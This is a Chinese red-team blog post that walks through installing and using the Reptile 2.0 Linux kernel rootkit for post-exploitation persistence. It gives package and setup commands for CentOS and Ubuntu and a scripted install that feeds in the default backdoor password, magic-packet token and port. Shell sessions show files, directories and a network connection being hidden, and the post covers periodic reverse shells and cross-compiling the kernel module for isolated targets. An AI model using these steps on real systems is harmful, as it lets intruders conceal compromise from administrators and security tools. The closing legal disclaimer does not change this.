文章总结: 文档介绍了Linux内核级Rootkit工具Reptile2.0的权限维持功能,包括隐藏文件、进程、网络连接及后门访问机制。详细说明了在CentOS/Ubuntu系统的安装配置步骤,重点分析了隐藏名称、认证令牌、后门密码等关键参数设置。作者指出在断网环境中需交叉编译驱动文件,并分享了实际测试中在内核4.15环境成功但6.x内核编译失败的经验。 综合评分: 75 文章分类: 内网渗透,红队,权限维持,Linux安全,渗透测试
【内网渗透】rootkit后门Reptile2.0权限维持
原创
Asuna Asuna
皇后红队
2026年5月16日 01:53 新加坡
在小说阅读器读本章
去阅读
Reptile 是一款针对 Linux 系统的高级 内核级 Rootkit(LKM – Loadable Kernel Module) 权限维持工具。
与运行在应用层(User-mode)的后门不同,Reptile 运行在操作系统内核层。它通过钩子(Hooking)技术拦截内核函数调用,从而在系统底层实现对进程、文件、网络连接的彻底隐藏。在红队行动或渗透测试中,它通常被用于在获取 root 权限后,建立一个极难被管理员和安全软件(如 top、ls、netstat)发现的深度持久化通道。
赋予非特权用户以root权限
隐藏文件和目录
隐藏进程
隐藏自己
隐藏TCP/UDP连接
隐藏的引导持久性
文件内容篡改
一些混淆技术
ICMP/UDP/TCP端口敲门后门
Clientto handle Reptile Shell
Shellconnect back each X times (not default)
不过,Reptile2.0 原版仓库已经被删了,如果你需要可以关注公众号后台回复:reptile
ae09f86e8181a44e0b3b2a15fbaa0c704ced3f703002805ef52256834bfd4ab4 Reptile-2.0.zip
┌──(kali㉿kali)-[~]
└─$ cd Reptile-2.0
┌──(kali㉿kali)-[~/Reptile-2.0]
└─$ ls
Kbuild loader.c parasite_loader rep_mod.c scripts
khook Makefile README.md sbin setup.sh
当然一般情况下你是直接可以
centos:
yum -y install perl vim gcc make g++ unzip
# 由于Cenots内核管理不便,所以使用下载对应版本的kernel-devel到本地
yum -y localinstall kernel-devel-"$kernel".rpm
cd Reptile-2.0/ && chmod +x ./setup.sh
./setup.sh install
Ubuntu:
apt-get install vim gcc make g++ unzip -y
apt-get -y install linux-headers-$(uname -r)
cd Reptile-2.0/ && chmod +x ./setup.sh
./setup.sh install
1、Hide name (will be used to hide dirs/files) (default: reptile):
它的作用:这是在设置一个“幻影名称”。Rootkit 安装后,所有包含这个关键字的文件、目录、进程或端口,在常规的命令(如 ls, ps, netstat, top)下都会变得不可见。
2、Auth token to magic packets (default: hax0r):
简单来说,这是为了防止其他人随机发现并利用你的 Rootkit,只有发送包含这个特定字符串的“魔法数据包”(Magic Packets),Rootkit 隐藏的后门端口才会处于监听状态或对你开放。
3、Backdoor password (default: s3cr3t):
这个提示是在设置 后门登录的本地密码。
如果说上一步的 Auth token 是用来“敲门”的暗号,那么这个 Backdoor password 就是你进入系统后,获取最高权限(Root)时需要输入的通行证。
4、Tag name that hide file contents (default: reptile):
● 它的作用:这是一个“内容遮蔽卡”。它不仅隐藏文件名,还能隐藏文件内部的具体内容。
● 它是如何工作的: 如果你在一个普通的文件(比如 /etc/passwd 或某个日志文件)里写入了带有这个标签的代码或配置,当普通用户使用 cat、vi 或 grep 查看该文件时,包含这个标签的那几行内容会直接“消失”,就像从来没写进去过一样。
● 默认值:reptile。
5、Source port of magic packets (default: 666):
这个提示是在设置 “激活信号”的源端口。
在 Reptile 的工作逻辑中,它不仅检查数据包里的字符串(之前你设定的 Auth token),还会检查这个包是从哪个源端口发出来的。
6、Would you like to config reverse shell each X time? (y/n) (default: n):
这一步是在询问你是否要配置 “定时反弹 Shell”(Persistent Reverse Shell)。
这是权限维持(Persistence)中的一个关键功能。
详细解释
● 它的作用:如果你选 y(yes),Rootkit 会在系统后台启动一个定时任务。每隔一段时间(由你设定),它就会主动尝试连接你指定的控制端 IP 和端口。
7、Would you like to remove this directory (/rep/Reptile-2.0/) on exit? (Y/N) [default: N]:
是否擦除当前所有痕迹
一键自动化(设置按需修改):
# reptile 2.0
$kernel=`uname -r`
# centos
yum -y install perl vim gcc make g++ unzip
# 由于Cenots内核管理隐藏流程不便,所以使用下载对应版本的kernel-devel到本地
yum -y localinstall kernel-devel-"$kernel".rpm
cd Reptile-master/ && chmod +x ./setup.sh
./setup.sh install <<EOF
reptile
hax0r
s3cr3t
reptile
666
n
N
EOF
# ubuntu
apt-get install vim gcc make g++ unzip -y
apt-get -y install linux-headers-$(uname -r)
cd Reptile-master/ && chmod +x ./setup.sh
./setup.sh install <<EOF
reptile
hax0r
s3cr3t
reptile
666
n
N
EOF
1、隐藏文件、文件目录
root@aaaweb:/rep# mkdir asuna_1
root@aaaweb:/rep# ls
root@aaaweb:/rep# ls -a
. ..
root@aaaweb:/rep# ls -l
total 0
root@aaaweb:/rep# cd asuna_1
root@aaaweb:/rep/asuna_1# pwd
/rep/asuna_1
root@aaaweb:/rep/asuna_1#
文件名中带asuna的都会被隐藏
root@aaaweb:/rep# touch asuna_1.sh
root@aaaweb:/rep# ls
root@aaaweb:/rep# ls -a
. ..
root@aaaweb:/rep# ls -l
total 0
root@aaaweb:/rep#
2、隐藏网络链接
隐藏连接: /reptile/reptile_cmd udp hide
显示连接: /reptile/reptile_cmd tcp show
netstat -anpt | grep 100.100.45.106
/reptile/reptile_cmd tcp 100.100.45.106 443 hide
但是实战总是不尽人意,在真实的内网渗透(横向移动)中,目标服务器往往是处于断网环境(隔离网)的。这时候你无法使用 apt-get之类的。
所以就需要搭建一个和目标机器内核版本完全一致的环境,在本地编译好 reptile.ko 驱动文件,然后只把这个编译好的 .ko 文件传到目标机器上加载(使用 insmod)。这样目标机器就不需要安装任何开发工具或头文件。
但是我发现我这样编译总是有问题,而且我尝试在 6.x 内核上编译失败,我目前没有 5.x 内核的虚拟机,在服务器上(Linux aaaweb 4.15.0-213-generic #224-Ubuntu)上测试成功,所以暂时先做到这,如果感兴趣的师傅可以从文章开头自取链接下载。
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:皇后红队 Asuna Asuna《【内网渗透】rootkit后门Reptile2.0权限维持》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论